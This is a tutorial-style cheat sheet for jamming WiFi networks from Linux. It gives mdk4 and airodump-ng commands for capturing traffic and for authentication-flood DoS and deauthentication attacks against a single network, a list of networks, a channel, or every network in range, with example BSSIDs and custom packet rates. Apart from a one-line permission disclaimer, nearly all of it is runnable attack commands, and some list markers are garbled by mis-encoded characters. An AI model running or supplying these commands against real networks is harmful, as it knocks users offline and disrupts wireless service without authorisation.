How to Perform a WiFi jamming Attack from Linux by using mdk4?
One of the best and most powerful tools for Ethical hackers in WiFi penetration testing is mdk4 because of it various options not make only it feature-rich, it makes it way more dangerous too. I become speechless when I explore the switch and the ability of the mdk4 tool. mdk3 and aireplay-ng are very popular tools for WiFi jamming. And mdk4 is an advanced and feature-rich version of mdk3 which is developed by ASPj of k2wrlz and E7mer of 360PegasusTeam.
Note: Great power comes with great responsibilities. So Don't do anything stupid by using this tool which makes you in a trouble. Before performing any kind of attack, make sure you have permission from the network owner.
How to enable monitor mode in Linux?
How to capture wireless packets of wireless networks for a wireless attack?
- capture all networks packets/frames
- capture target network packets/frames
- caputre network packets/frames by channel
- save all the captured information
How to perform a DOS attack on a Wireless network (WiFi) from Linux?
- in all wireless network
- by targeting wireless network
- from valid MAC addresses
- by packets per second (custom speed)
How to perform a DeAuth attack on a Wireless network (WiFi) from Linux?
- in all wireless network
- by targeting wireless network
- by targeting multiple wireless networks
- by targeting wireless network channel
- by packets per second (custom speed)
⚪How to install mdk4 in Linux?
sudo apt install -y wireless-tools mdk4 aircrack-ng
sudo pacman --noconfirm -S aircrack-ng mdk4 wireless_tools
⚪How to enable monitor mode in Linux?
sudo iw wlan0 interface add mon type monitor
⚪How to capture wireless packets of wireless networks for a wireless attack?
â‘ . capture all networks packets/frames
sudo airodump-ng [MON-INTERFACE]
sudo airodump-ng mon
â‘¡. capture target network packets/frames
sudo airodump-ng [MON-INTERFACE] --bssid [BSSID]
sudo airodump-ng mon --bssid 04:95:E6:98:6D:49
â‘¢. capture network packets/frames by channel
sudo airodump-ng [INTERFACE] -c [channel_number]
sudo airodump-ng mon -c 5
â‘£. save all the captured information
sudo airodump-ng [MON-INTERFACE] -w <file name>
sudo airodump-ng mon -w myfilename
⚪How to perform a DOS attack on a Wireless network (WiFi) from Linux?
â‘ . How to perform a DOS attack on all Wireless networks?
sudo mdk4 [MON-INTERFACE] a
sudo mdk4 mon a
â‘¡. How to perform a DOS attack by targeting a wireless network?
sudo mdk4 [MON-INTERFACE] a -a [BSSID]
â‘¢. How to perform a DOS attack from valid MAC addresses in a wireless network?
sudo mdk4 [INTERFACE] a -m
sudo mdk4 mon a -m
â‘£. How to perform a DOS attack by packets per second (custom speed) in a wireless network?
sudo mdk4 [INTERFACE] a -m -s [PPS]
sudo mdk4 mon a -m -s 30
⚪How to perform a DeAuth attack on a Wireless / WiFi network?
sudo mdk4 [INTERFACE] d
sudo mdk4 mon d
â‘¡. How to perform a DeAuth attack by targeting a wireless network?
sudo mdk4 [INTERFACE] d -E [SSID]
sudo mdk4 mon d -E "RADMI NOTE 10 PRO MAX"
â‘¡.i) How to perform a DeAuth attack by targeting a wireless network as a Whitelist mode?
sudo mdk4 [MON-INTERFACE] d -W [BSSID]
sudo mdk4 mon d -W 04:95:E6:98:6D:49
â‘¡.ii) How to perform a DeAuth attack by targeting a wireless network as a Blacklist mode?
sudo mdk4 [MON-INTERFACE] d -B [BSSID]
sudo mdk4 mon d -B 04:95:E6:98:6D:49
â‘¢. How to perform a DeAuth attack by targeting multiple wireless networks?
sudo mdk4 [MON-INTERFACE] d -w [file path]
sudo mdk4 mon d -w wifi.txt
â‘¢.ii) How to perform a DeAuth attack by targeting multiple wireless networks as a Blacklist mode?
sudo mdk4 [MON-INTERFACE] d -b [file path]
sudo mdk4 mon d -b wifi.txt
â‘£. How to perform a DeAuth attack by targeting a wireless network channel?
sudo mdk4 [MON-INTERFACE] d -c [channel_number]
sudo mdk4 mon d -c 5
⑤. How to perform a DeAuth attack by packets per second (custom speed) in a wireless network?
sudo mdk4 [MON-INTERFACE] d -s <PPS>
sudo mdk4 mon d -s 20